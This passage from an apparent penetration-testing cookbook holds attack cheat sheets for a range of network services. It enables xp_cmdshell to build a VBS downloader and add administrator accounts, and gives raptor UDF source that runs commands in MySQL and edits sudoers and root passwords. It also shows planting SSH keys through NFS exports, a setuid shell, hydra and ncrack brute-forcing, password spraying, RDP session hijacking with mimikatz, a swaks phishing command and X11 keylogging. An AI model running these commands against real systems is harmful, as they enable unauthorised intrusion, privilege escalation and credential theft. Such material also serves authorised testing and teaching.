'echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs' 104 | go 105 | xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs' 106 | go 107 | xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs' 108 | go 109 | xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs' 110 | go 111 | xp_cmdshell 'echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs' 112 | go 113 | xp_cmdshell 'echo Err.Clear >> wget.vbs' 114 | go 115 | xp_cmdshell 'echo Set http = Nothing >> wget.vbs' 116 | go 117 | xp_cmdshell 'echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs' 118 | go 119 | xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs' 120 | go 121 | xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs' 122 | go 123 | xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs' 124 | go 125 | xp_cmdshell 'echo http.Open "GET",strURL,False >> wget.vbs' 126 | go 127 | xp_cmdshell 'echo http.Send >> wget.vbs' 128 | go 129 | xp_cmdshell 'echo varByteArray = http.ResponseBody >> wget.vbs' 130 | go 131 | xp_cmdshell 'echo Set http = Nothing >> wget.vbs' 132 | go 133 | xp_cmdshell 'echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs' 134 | go 135 | xp_cmdshell 'echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs' 136 | go 137 | xp_cmdshell 'echo strData = "" >> wget.vbs' 138 | go 139 | xp_cmdshell 'echo strBuffer = "" >> wget.vbs' 140 | go 141 | xp_cmdshell 'echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs' 142 | go 143 | xp_cmdshell 'echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs' 144 | go 145 | xp_cmdshell 'echo Next >> wget.vbs' 146 | go 147 | xp_cmdshell 'echo ts.Close >> wget.vbs' 148 | go 149 | 150 | `` Using sqsh 151 | 152 | ~$ cat ~/.freetds.conf 153 | [mssql1] 154 | host = VAR_TARGET_HOST 155 | port = 27900 156 | tds version = 8.0 157 | ~$ sqsh -S mssql1 -U sa 158 | > exec sp_configure "show advanced options", 1 159 | > go 160 | > reconfigure 161 | > go 162 | > exec sp_configure "xp_cmdshell", 1 163 | > go 164 | > reconfigure 165 | > go 166 | > xp_cmdshell "whoami" 167 | > go 168 | > xp_cmdshell "net user VAR_USERNAME VAR_PASSWORD /add" 169 | > xp_cmdshell "net localgroup administrators VAR_USERNAME /add" 170 | -------------------------------------------------------------------------------- /Target.Host.Service.DB.MySQL.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -p 3306 -sV -Pn -vv --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-info,mysql-query,mysql-users,mysql-variables VAR_TARGET_HOST 4 | 5 | -- NOTE: mysql-enum is unreliable 6 | 7 | `` Password Bruteforcing 8 | 9 | ~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD mysql://VAR_TARGET_HOST 10 | 11 | -- With a list of targets 12 | ~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD -M VAR_TARGET_HOSTS mysql 13 | 14 | `` Dump 15 | 16 | ~$ mysqldump -h VAR_TARGET_HOST -u root -p --single-transaction --quick --lock-tables=false > dump.sql 17 | 18 | `` Extension upload 19 | 20 | SELECT @@plugin_dir; 21 | 22 | SELECT 0x7f454c...00000 into dumpfile "/var/lib/mysql/udf.so"; 23 | 24 | CREATE function sys_eval returns string soname 'udf.so'; 25 | SELECT * from mysql.func where name = 'sys_eval'; 26 | SELECT sys_eval('dir'); 27 | DROP function sys_eval; 28 | 29 | echo '' | xxd -ps | tr -d '\n' 30 | 31 | `` raptor.c 32 | 33 | #include 34 | #include 35 | 36 | enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT}; 37 | 38 | typedef struct st_udf_args { 39 | unsigned int arg_count; // number of arguments 40 | enum Item_result *arg_type; // pointer to item_result 41 | char **args; // pointer to arguments 42 | unsigned long *lengths; // length of string args 43 | char *maybe_null; // 1 for maybe_null args 44 | } UDF_ARGS; 45 | 46 | typedef struct st_udf_init { 47 | char maybe_null; // 1 if func can return NULL 48 | unsigned int decimals; // for real functions 49 | unsigned long max_length; // for string functions 50 | char *ptr; // free ptr for func data 51 | char const_item; // 0 if result is constant 52 | } UDF_INIT; 53 | 54 | int do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) 55 | { 56 | if (args->arg_count != 1) 57 | return(0); 58 | system(args->args[0]); 59 | return(0); 60 | } 61 | 62 | char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message) 63 | { 64 | return(0); 65 | } 66 | 67 | 68 | $ gcc -fPIC -g -c raptor.c 69 | $ gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc 70 | $ xxd -p -c `stat --format="%s" raptor.so` raptor.so 71 | 72 | mysql> SELECT '' INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so' 73 | mysql> CREATE function do_cmd returns integer soname "raptor.so"; 74 | mysql> SELECT do_cmd("echo 'root:root'|chpasswd"); 75 | 76 | 77 | gcc -g -c raptor_udf2.c 78 | gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc 79 | mysql -u root 80 | mysql> use mysql; 81 | mysql> create table foo(line blob); 82 | mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so')); 83 | mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so'; 84 | mysql> create function do_system returns integer soname 'raptor_udf2.so'; 85 | mysql> select * from mysql.func; 86 | +-----------+-----+----------------+----------+ 87 | | name | ret | dl | type | 88 | +-----------+-----+----------------+----------+ 89 | | do_system | 2 | raptor_udf2-2.so | function | 90 | +-----------+-----+----------------+----------+ 91 | mysql> select do_system('adduser toor'); 92 | mysql> select do_system('echo "toor ALL=(ALL) ALL" >> /etc/sudoers'); 93 | mysql> select do_system('echo "toor:toor" | /usr/sbin/chpasswd'); 94 | -------------------------------------------------------------------------------- /Target.Host.Service.DB.PostgreSQL.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap VAR_TARGET_HOST -v -p 5432 -sV -Pn -vv 4 | 5 | `` Password Bruteforcing 6 | 7 | ~$ nmap -p 5432 --script pgsql-brute --script-args userdb=users.txt,passdb=VAR_WORDLIST VAR_TARGET_HOST 8 | ~$ hydra -L users.txt -V -P VAR_WORDLIST VAR_TARGET_HOST postgres 9 | 10 | `` Dump 11 | 12 | -- Dump single database 13 | ~$ pg_dump dbname | gzip > dump.gz 14 | 15 | -- Dump cluster 16 | ~$ pg_dumpall | gzip > dump.gz 17 | 18 | `` Database access 19 | 20 | ~$ psql -h VAR_TARGET_HOST -U postgres 21 | -------------------------------------------------------------------------------- /Target.Host.Service.FTP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -n -v -p 21 --script ftp-anon,ftp-syst VAR_TARGET_HOST 4 | 5 | `` Password Bruteforcing 6 | 7 | ~$ nmap -n -v -p 21 --script ftp-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST 8 | ~$ ncrack -u VAR_USERNAME -P VAR_WORDLIST_PASSWORD -T 5 VAR_TARGET_HOST -p 21 9 | ~$ medusa -h VAR_TARGET_HOST -u VAR_USERNAME -P VAR_WORDLIST_PASSWORD -M ftp 10 | 11 | `` Massive download 12 | 13 | ~$ wget --recursive --ftp-user=anonymous --ftp-password=any --no-passive-ftp ftp://VAR_TARGET_HOST 14 | -------------------------------------------------------------------------------- /Target.Host.Service.IDENT.txt: -------------------------------------------------------------------------------- 1 | `` User enumeration 2 | 3 | ~$ nmap -n -v -p 113 --script auth-owners VAR_TARGET_HOST -------------------------------------------------------------------------------- /Target.Host.Service.LDAP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | `` Anonymous 4 | 5 | ~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -b "dc=VAR_DOMAIN,dc=com" 6 | LDAPExplorertool2 7 | 8 | `` Authenticated 9 | 10 | ~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -D "CN=Administrator, CN=User, DC=VAR_DOMAIN, DC=com" -b "DC=VAR_DOMAIN, DC=com" -W 11 | -------------------------------------------------------------------------------- /Target.Host.Service.MSRPC.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -n -v -sV -Pn -p135 --script msrpc-enum --script-args vulns.showall VAR_TARGET_HOST 4 | 5 | `` Connect 6 | 7 | ~$ rpcclient -U VAR_TARGET_DOMAIN/VAR_USERNAME VAR_TARGET_HOST 8 | 9 | `` Version of the target Windows machine 10 | 11 | rpcclient $> srvinfo 12 | 13 | `` Specific user / computer information by RID 14 | 15 | rpcclient $> queryuser VAR_RID 16 | 17 | `` Domain 18 | 19 | rpcclient $> querydominfo 20 | 21 | `` Domain users, groups, shares, privileges 22 | 23 | rpcclient $> enumdomusers 24 | rpcclient $> enumdomgroups 25 | rpcclient $> querygroup VAR_RID 26 | rpcclient $> querygroupmem VAR_RID 27 | rpcclient $> queryuser VAR_RID 28 | rpcclient $> netshareenum 29 | rpcclient $> netshareenumall 30 | rpcclient $> enumprivs 31 | 32 | `` Reset domain user password 33 | 34 | rpcclient $> setuserinfo2 VAR_USERNAME 23 'VAR_PASSWORD' 35 | 36 | ~$ net rpc password administrator -U VAR_USERNAME -S VAR_TARGET_HOST 37 | 38 | `` Check domain password policy 39 | 40 | rpcclient $> getdompwinfo 41 | rpcclient $> getusrdompwinfo VAR_RID 42 | 43 | `` Password spraying 44 | 45 | ~$ rpcclient -U "VAR_USERNAME%VAR_PASSWORD" -c "getusername;quit" VAR_TARGET_HOST 46 | 47 | -- Snippet 48 | 49 | VAR_PASSWORD=Passw0rd 50 | VAR_TARGET_HOST=10.0.0.1 51 | for user in `cat domain-users.txt`; do 52 | echo -n "$user:$VAR_PASSWORD" && rpcclient -U "$user:$VAR_PASSWORD" -c "getusername;quit" $VAR_TARGET_HOST 53 | done 54 | -------------------------------------------------------------------------------- /Target.Host.Service.NFS.txt: -------------------------------------------------------------------------------- 1 | `` Scanning for accessible exports 2 | 3 | ~$ nmap -v -n -p 111 --script nfs-ls VAR_TARGET_NETWORK 4 | 5 | `` General 6 | 7 | ~$ showmount -e VAR_TARGET_HOST 8 | 9 | `` Mounting 10 | 11 | `` Anonymous 12 | 13 | ~$ mount -t nfs VAR_TARGET_HOST:/secret /tmp/remote_dir 14 | 15 | `` NFS #1 16 | 17 | ~$ mount -t nfs VAR_TARGET_HOST:/secret /mnt/share/ 18 | ~$ cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys 19 | ~$ umount /mnt/share 20 | ~$ ssh root@VAR_TARGET_HOST 21 | 22 | `` NFS #2 23 | 24 | ~$ cat /etc/exports 25 | ~$ mkdir /tmp/.tmp 26 | ~$ mount -t nfs VAR_TARGET_HOST:/tmp /tmp/.tmp 27 | ~$ ls -lah /tmp/.tmp 28 | ~$ gcc -o /tmp/.tmp/shell shell.c 29 | ~$ root@kali:/tmp/.tmp# chown root:root shell 30 | ~$ root@kali:/tmp/.tmp# chmod +s shell 31 | 32 | `` I/O Error? 33 | 34 | ~$ mount -t nfs -o nfsvers=2 VAR_TARGET_HOST:/secret /tmp/remote_dir -------------------------------------------------------------------------------- /Target.Host.Service.POP3.txt: -------------------------------------------------------------------------------- 1 | `` Password Bruteforcing 2 | 3 | ~$ nmap -n -v -p 995 --script pop3-brute --script-args=vulns.showall VAR_TARGET_HOST 4 | ~$ hydra -I -l VAR_USERNAME -e nsr -P VAR_WORDLIST_PASSWORD -f -V pop3://VAR_TARGET_HOST 5 | ~$ hydra -I -C VAR_WORDLIST_COMBO -e nsr -t 10 -V pop3://VAR_TARGET_HOST 6 | -------------------------------------------------------------------------------- /Target.Host.Service.RDP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap --script rdp-enum-encryption,rdp-ntlm-info VAR_TARGET_HOST 4 | 5 | `` Connection 6 | 7 | ~$ rdesktop -u guest -p guest VAR_TARGET_HOST -g 85% 8 | ~$ rdesktop -u VAR_USERNAME -p VAR_PASSWORD -g 85% -r disk:share=/root/ VAR_TARGET_HOST 9 | 10 | `` PTH 11 | 12 | -- PTH available for Windows 2012 R2 and Windows 8.1 13 | ~$ xfreerdp /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST 14 | 15 | `` Password Bruteforcing 16 | 17 | ~$ hydra -V -t 1 -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD rdp://VAR_TARGET_HOST 18 | ~$ ncrack -vv --pairwise -U ../usernames.txt -P ../passwords.txt -f --stealthy-linear rdp://VAR_TARGET_HOST 19 | 20 | `` Hijacking disconnected sessions 21 | 22 | `` Using service 23 | 24 | ~> query user 25 | -- grab session names or IDs 26 | ~> sc.exe create VAR_STRING binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1" type= own 27 | ~> sc.exe start VAR_STRING 28 | ~> sc.exe delete VAR_STRING 29 | 30 | `` Using mimikatz 31 | 32 | ~> mimikatz 33 | mimikatz # ts::sessions 34 | mimikatz # privilege::debug 35 | mimikatz # token::elevate 36 | mimikatz # ts::remote /id:2 37 | -------------------------------------------------------------------------------- /Target.Host.Service.RPC.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ rpcinfo -p VAR_TARGET_HOST 4 | ~$ nmap --script rpcinfo --script-args=unsafe=1 -p VAR_TARGET_PORT VAR_TARGET_HOST 5 | ~$ nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p VAR_TARGET_PORT VAR_TARGET_HOST 6 | -------------------------------------------------------------------------------- /Target.Host.Service.SMB.txt: -------------------------------------------------------------------------------- 1 | `` Check remote target access 2 | 3 | ~> net use \\VAR_TARGET_HOST\C$ 4 | ~> dir \\VAR_TARGET_HOST\C$ 5 | 6 | `` Enumeration 7 | 8 | -- NetBIOS information 9 | ~$ nbtscan -vh VAR_TARGET_HOST 10 | 11 | -- Version if anything else fails 12 | ~$ smbver.sh 13 | 14 | -- Check for permissions first 15 | ~$ smbmap -H VAR_TARGET_HOST 16 | 17 | -- Anything more? 18 | ~$ enum4linux -a VAR_TARGET_HOST 19 | 20 | -- Null session allowed? 21 | ~$ smbclient -N -L VAR_TARGET_HOST 22 | ~> net use \\VAR_TARGET_HOST\IPC$ "" /u:"" 23 | 24 | -- Passwordless admin? 25 | ~$ smbclient //VAR_TARGET_HOST/ipc$ -U Administrator 26 | 27 | `` Vulnerability scanning 28 | 29 | ~$ nmap -v -n -p 139,445 -sS -g 53 --script=smb-double-pulsar-backdoor,"smb-enum-*",smb-ls,smb-mbenum,smb-enum-users,smb-os-discovery,smb-print-text,smb-psexec,smb-security-mode,smb-server-stats,"smb-vuln-*","smb2-*" --script-args=vulns.showall --script-args=unsafe=1 VAR_TARGET_HOST 30 | 31 | `` Shares listing 32 | 33 | ~> net view \\VAR_TARGET_HOST /all 34 | ~$ smbmap -u VAR_USERNAME -p VAR_PASSWORD -H VAR_TARGET_HOST 35 | ~$ nmap --script smb-enum-shares -p139,445 -v -n --open VAR_TARGET_HOST 36 | ~$ smbclient -U "VAR_USERNAME%VAR_PASSWORD" \\\\VAR_DOMAIN\SYSVOL 37 | 38 | `` Share mount 39 | 40 | ~$ mount -t cifs //VAR_TARGET_HOST/share /mnt/tmp -o,username=VAR_TARGET_DOMAIN/VAR_USERNAME,password=VAR_PASSWORD,vers=2.0 41 | # SMBv2 42 | 43 | `` Various 44 | 45 | ~$ nbtscan -r VAR_TARGET_HOST 46 | ~$ smbclient //VAR_TARGET_HOST/ipc$ 47 | ~$ smbclient //VAR_TARGET_HOST/admin$ 48 | ~$ smbclient -W VAR_TARGET_DOMAIN -U user -L VAR_TARGET_HOST 49 | ~$ proxychains smbclient '//VAR_TARGET_HOST/C$' -U 'VAR_TARGET_DOMAIN/VAR_USERNAME%VAR_PASSWORD' 50 | 51 | `` Recursive download 52 | 53 | ~$ smbclient -N //VAR_TARGET_HOST/C$ 54 | smb: \> mask "" 55 | smb: \> prompt 56 | smb: \> recurse 57 | smb: \> mget Users 58 | -------------------------------------------------------------------------------- /Target.Host.Service.SMTP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap --script smtp-commands,smtp-enum-users -vv -sV -Pn -p 25 VAR_TARGET_HOST 4 | 5 | `` Testing 6 | 7 | ~$ swaks --to user@VAR_TARGET_HOST --from user@example.com --server VAR_TARGET_HOST:25 --body "Some text" --header "Subject: Important" 8 | 9 | `` Password Bruteforcing 10 | 11 | ~$ hydra -I -P VAR_WORDLIST -V smtp://VAR_TARGET_HOST 12 | 13 | `` User enumeration 14 | 15 | ~$ nc -nv VAR_TARGET_HOST 25 16 | VRFY VAR_USERNAME 17 | 18 | ~$ smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t VAR_TARGET_HOST 19 | 20 | ~$ hydra smtp-enum://VAR_TARGET_HOST/vrfy -l VAR_USERNAME -p localhost 21 | 22 | `` Phishing with swaks (HTML template) 23 | 24 | swaks --from sender@example.com --h-From: '=?utf-8?B?VAR_BASE64_VALUE?= ' --to receiver@example.com,bcc@example.com --h-To: '"ASCII without encoding" ' --server VAR_TARGET_HOST:25 --attach-type "text/html;charset=utf-8" --attach-body body.html --header "Subject: =?utf-8?B?VAR_BASE64_VALUE?=" --attach-type "image/png" --attach logo.png -------------------------------------------------------------------------------- /Target.Host.Service.SNMP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | `` Network discovery 4 | 5 | ~$ nmap -sU -sV -p 161 VAR_TARGET_RANGE 6 | ~$ onesixtyone -s -o VAR_FILENAME VAR_TARGET_CIDR 7 | ~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt VAR_TARGET_HOST 8 | ~$ hydra -P /usr/share/seclists/Discovery/SNMP/snmp.txt -V VAR_TARGET_HOST snmp 9 | 10 | `` Basic 11 | 12 | ~$ nmap -v -sV -Pn -sU -p 161,162 --script snmp-info,snmp-interfaces,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users VAR_TARGET_HOST 13 | 14 | `` Extended 15 | 16 | ~$ python ./snmpbrute.py -t VAR_TARGET_HOST -f /usr/share/seclists/Discovery/SNMP/snmp.txt 17 | ~$ xprobe2 -v -p udp:161:open VAR_TARGET_HOST 18 | ~$ snmp-check VAR_TARGET_HOST -c public 19 | 20 | `` FTP Bounce scanning 21 | 22 | ~$ nmap VAR_TARGET_HOST -b VAR_FTP_HOST -Pn -n -g 88 -v -sU -p 161,162 --script snmp-netstat,snmp-processes 23 | 24 | `` Network range 25 | 26 | #!/bin/bash 27 | for ip in $(cat ip_list.txt); do 28 | echo $ip; 29 | for str in $(cat /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings_onesixtyone.txt); do 30 | if snmpwalk -OsS -v 1 -c $str $ip > $ip.snmpwalk; then 31 | break 32 | fi 33 | done; 34 | done 35 | 36 | `` Table 37 | 38 | - 1.3.6.1.2.1.25.1.6.0 - System Processes 39 | - 1.3.6.1.2.1.25.2.3.1.4 - Storage Units 40 | - 1.3.6.1.2.1.25.4.2.1.2 - Running Programs 41 | - 1.3.6.1.2.1.25.4.2.1.4 - Processes Path 42 | - 1.3.6.1.2.1.25.6.3.1.2 - Software Name 43 | - 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports 44 | - 1.3.6.1.4.1.77.1.2.25 - User Accounts 45 | 46 | `` Community strings 47 | 48 | - /usr/share/wordlists/fasttrack.txt 49 | 50 | `` Community string bruteforcing 51 | 52 | ~$ nmap -sU VAR_TARGET_HOST -p 161 --script snmp-brute -Pn --script-args snmp-brute.communitiesdb=/usr/share/wordlists/fasttrack.txt 53 | ~$ onesixtyone -c /usr/share/wordlists/dirb/small.txt VAR_TARGET_HOST 54 | 55 | ~$ for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt);do snmpwalk -v 1 -c $i VAR_TARGET_HOST;done| grep -v "Timeout" 56 | 57 | ~$ echo public > community-strings.txt 58 | ~$ echo private >> community-strings.txt 59 | ~$ echo manager >> community-strings.txt 60 | ~$ for ip in $(seq 1 254);do echo VAR_TARGET_HOST_BASE.$ip;done > ips 61 | ~$ onesixtyone -c community-strings.txt -i ips 62 | 63 | ~$ hydra -P password-file.txt -V VAR_TARGET_HOST snmp 64 | 65 | `` Community string checks 66 | 67 | ~$ snmp-check VAR_TARGET_HOST -c public 68 | ~$ snmpget -v 1 -c public VAR_TARGET_HOST 69 | ~$ snmpwalk -v 1 -c public VAR_TARGET_HOST 70 | ~$ snmpbulkwalk -v2c -c public -Cn0 -Cr10 VAR_TARGET_HOST 71 | 72 | `` Windows users 73 | 74 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.4.1.77.1.2.25 75 | 76 | `` Running processes 77 | 78 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST P 1.3.6.1.2.1.25.4.2.1.2 79 | 80 | `` Open TCP ports 81 | 82 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.6.13.1.3 83 | 84 | `` Installed software 85 | 86 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.25.6.3.1.2 87 | 88 | `` Shares 89 | 90 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.4.1.77.1.2.3.1.1 91 | 92 | `` Password Bruteforcing 93 | 94 | ~$ hydra -P VAR_WORDLIST -V VAR_TARGET_HOST snmp 95 | -------------------------------------------------------------------------------- /Target.Host.Service.SSH.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -p 22 --script ssh-enum-algos,ssh-auth-methods,ssh-hostkey,ssh-publickey-acceptance,ssh-run VAR_TARGET_HOST 4 | 5 | `` Generate public key from private 6 | 7 | ~$ ssh-keygen -f id_rsa -y > id_rsa.pub 8 | 9 | `` Password Bruteforcing 10 | 11 | -- Verbose (-V), ignore previous results (-I), quit if matches (-F) 12 | 13 | -- Default port 14 | ~$ hydra -V -I -F -L VAR_WORDLIST_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST 15 | 16 | -- Maximum wait 80, wait between 3, wait 1 per login attempt 17 | ~$ hydra -V -I -F -t 1 -w 80 -c 1 -W 3 -f -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST 18 | 19 | -- Use single username and non-default port 20 | ~$ hydra -V -I -F -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -s VAR_TARGET_PORT -e nsr ssh://VAR_TARGET_HOST 21 | 22 | -- Use combined file (login:pass) and host list 23 | ~$ hydra -V -F -C VAR_WORDLIST_COMBO -M VAR_TARGET_HOSTS ssh 24 | 25 | `` With keys 26 | 27 | `` Single 28 | 29 | ~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/id_rsa 30 | 31 | `` All 32 | 33 | ~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/ 34 | 35 | `` All in discovery mode 36 | 37 | ~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/ -d 38 | 39 | `` Enumerate users 40 | 41 | ~$ ssh_enum_time.py -U usernames.txt VAR_TARGET_HOST 42 | 43 | `` Legacy issues 44 | 45 | -- No matching key exchange method found 46 | ~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 VAR_USERNAME@VAR_TARGET_HOST 47 | 48 | -- No matching host key type found 49 | ~$ ssh -oHostKeyAlgorithms=+ssh-dss VAR_USERNAME@VAR_TARGET_HOST 50 | 51 | `` PuTTY to OpenSSH 52 | 53 | ~$ puttygen id_rsa.ppk -O private-openssh -o id_rsa 54 | ~$ puttygen id_rsa.ppk -O public-openssh -o id_rsa.pub 55 | -------------------------------------------------------------------------------- /Target.Host.Service.TELNET.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -v -n -p 23 VAR_TARGET_NETWORK 4 | 5 | `` Password Bruteforcing 6 | 7 | ~$ nmap -n -v -p 23 --script telnet-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD,brute.firstonly=true VAR_TARGET_HOST 8 | 9 | -- When username not required 10 | ~$ nmap -n -v -p 23 --script telnet-brute --script-args passdb=VAR_WORDLIST_PASSWORD,brute.firstonly=true,brute.passonly=true VAR_TARGET_HOST 11 | -------------------------------------------------------------------------------- /Target.Host.Service.VNC.txt: -------------------------------------------------------------------------------- 1 | `` Password Bruteforcing 2 | 3 | ~$ hydra -s 5900 -P VAR_WORDLIST -V -t 8 VAR_TARGET_HOST vnc 4 | 5 | ~$ crowbar.py -b vnckey -s VAR_CIDR -p 5902 -k /root/.vnc/passwd 6 | -------------------------------------------------------------------------------- /Target.Host.Service.X11.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap --script x11-access -p6000-6025 -n -v -Pn VAR_TARGET_HOST 4 | 5 | `` Information Gathering 6 | 7 | ~$ xwininfo -root -display VAR_TARGET_HOST:0 8 | ~$ xspy -display VAR_TARGET_HOST:0 9 | 10 | `` Connection 11 | 12 | -- Screen grabbing 13 | ~$ xwd -root -screen -silent -display VAR_TARGET_HOST:0 > screen.xwd 14 | ~$ convert screen.xwd screen.png 15 | 16 | -- Disable screensaver 17 | ~$ xset -display VAR_TARGET_HOST:0.0 s reset 18 | 19 | -- Connect to remote session 20 | ~$ xwatchwin -w VAR_STRING VAR_TARGET_HOST:0 21 | 22 | -- Keylogging 23 | ~$ xspy VAR_TARGET_HOST -------------------------------------------------------------------------------- /Target.Network.Scanning.txt: -------------------------------------------------------------------------------- 1 | `` Host discovery 2 | 3 | `` ARP 4 | 5 | ~$ arp -a 6 | ~$ arp-scan VAR_TARGET_CIDR -I eth0 7 | ~$ fping -ar 8 | 9 | `` TCP/IP 10 | 11 | -- Set some variables first 12 | ~$ export VAR_TARGET_CIDR=10.10.10.0/24 13 | ~$ export VAR_FILENAME=${VAR_TARGET_CIDR::${#VAR_TARGET_CIDR}-3} 14 | ~$ export VAR_TARGET_HOSTS=$VAR_FILENAME-hosts.txt 15 | 16 | -- Ping scan only, no DNS resolution 17 | ~$ nmap -sn -n -oA $VAR_FILENAME-ping-basic $VAR_TARGET_CIDR 18 | 19 | -- When ICMP not available, yet not complete and mostly for internal networks 20 | ~# nmap -sn -n -v -PA21,22,80,111,139,161,162,389,443,445 -PS21,22,80,111,139,161,162,389,443,445 -PU69,161,162,111,123,500 -oA $VAR_FILENAME-ping-fast $VAR_TARGET_CIDR 21 | 22 | -- A more in-depth discovery 23 | @ ~/lib/pentesting-cookbook/bin/scan_top.sh 24 | 25 | -- In case the scan fails: 26 | - Change source port, e.g. -g53 or -g88 27 | - Add --randomize-hosts 28 | - Change -PA to -PS 29 | - Run with --unprivileged 30 | 31 | -- Discovery using TCP over socks 32 | ~$ proxychains -q nmap -sn -n -PA21,22,23,80,111,123,137,138,139,161,389,443,445 VAR_TARGET_CIDR 33 | 34 | ~$ nbtscan -r VAR_TARGET_CIDR 35 | ~$ netdiscover -i eth1 -P -N -r VAR_TARGET_CIDR 36 | ~$ for i in $(seq 1 254); do ip_address="192.168.1.$i"; ping -c 1 -W 1 $ip_address | grep "bytes from" >/dev/null && echo "$ip_address :)" || echo -n "."; done 37 | 38 | `` Nmap ping scan types (root only) 39 | 40 | ~# nmap -sn -n -PE VAR_TARGET_CIDR 41 | 42 | PS - TCP SYN (default at port 80) 43 | PA - TCP ACK (default at port 80) 44 | PU - UDP 45 | PY - SCTP INIT 46 | PE - ICMP Echo 47 | PP - ICMP timestamp 48 | PM - ICMP address mask 49 | PO - Other IP protocol 50 | PR - ARP scan 51 | 52 | `` Data processing 53 | 54 | ~$ grep "Status: Up" $VAR_FILENAME-*.gnmap | cut -d" " -f2 | sort | uniq > $VAR_TARGET_HOSTS 55 | 56 | `` Service discovery 57 | 58 | -- Using input from network scanning: $VAR_TARGET_HOSTS 59 | 60 | `` Basic (with default nmap top ports) 61 | 62 | -- Basic approach, assume all hosts are up ($VAR_TARGET_HOSTS is "verified" already) 63 | ~$ nmap -Pn -n -v --top-ports 300 -iL $VAR_TARGET_HOSTS -oA $VAR_FILENAME-ports-top-300 64 | 65 | -- Another run this time with SYN scan 66 | ~$ nmap -sS -Pn -n -v --top-ports 300 -iL $VAR_TARGET_HOSTS -oA $VAR_FILENAME-ports-top-300-syn 67 | 68 | `` It's very likely nmap will be stuck due to disabling discovery stage (-Pn) in case of large scans, custom probes can be used to improve (only if not using $VAR_TARGET_HOSTS): 69 | 70 | ~$ nmap -n -v --top-ports 300 -PE -PP -PM -PS110,111,113,137,138,139,143,1433,1723,161,162,20,21,22,2001,2020,2222,23,2525,27017,3306,3389,389,4443,445,5020,5432,5061,587,5900,5901,636,6379,843,88,8000,8022,8080,8443,8888,993,995 -PU53,161,162,69,111,123,500 -iL 